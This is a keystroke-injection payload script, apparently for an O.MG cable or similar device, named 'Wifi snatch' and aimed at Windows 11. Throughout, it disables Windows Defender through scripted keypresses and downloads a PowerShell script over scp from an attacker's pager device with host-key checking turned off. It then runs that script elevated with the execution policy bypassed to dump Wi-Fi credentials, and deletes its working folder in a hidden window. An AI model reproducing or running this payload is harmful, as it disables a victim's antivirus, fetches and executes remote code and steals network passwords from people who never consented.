REM --------------------------------------------------Payload-------------------------------------------------------
REM Wifi snatch
REM OMG script using hotkeys and run commands to kill windows defender, dump wifi and upload to wifi pager thru scp
REM Windows 11
REM f3bandit
REM ----------------------------------------------------------------------------------------------------------------
DELAY 1000
windows r
DELAY 1000
STRINGLN windowsdefender:
DELAY 1000
ENTER
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
SPACE
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
SPACE
DELAY 200
ALT F4
DELAY 1000
windows r
DELAY 1000
STRINGLN cmd /c mkdir "%TEMP%\wifi" 2>nul
DELAY 1000
windows r
DELAY 1000
REM 
STRINGLN powershell -NoP -NoExit -Command "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@PAGER IP HERE:/mmc/root/payloads/user/exfiltration/wifi_loot_viewer/magic.ps1 \"$env:TEMP\wifi\magic.ps1\""
DELAY 2000
STRING PAGER SSH PASSWORD HERE
DELAY 2000
ENTER
DELAY 1000
ALT F4
DELAY 1000
windows r
DELAY 1000
STRINGLN powershell -Command "Start-Process powershell -Verb RunAs -ArgumentList '-NoP -ExecutionPolicy Bypass -Command & \"%TEMP%\wifi\magic.ps1\"'"
DELAY 4000
windows r
DELAY 1000
STRINGLN powershell -Command "Start-Process powershell -Verb RunAs -WindowStyle Hidden -ArgumentList '-NoP -NonI -Command Remove-Item -Path \"$env:TEMP\wifi\" -Recurse -Force'"
DELAY 1000
windows r
DELAY 1000
STRINGLN windowsdefender:
DELAY 1000
TAB
DELAY 200
SPACE
DELAY 200
ALT F4
windows r
DELAY 1000
STRINGLN windowsdefender:
DELAY 1000
TAB
DELAY 200
SPACE
DELAY 200
ALT F4
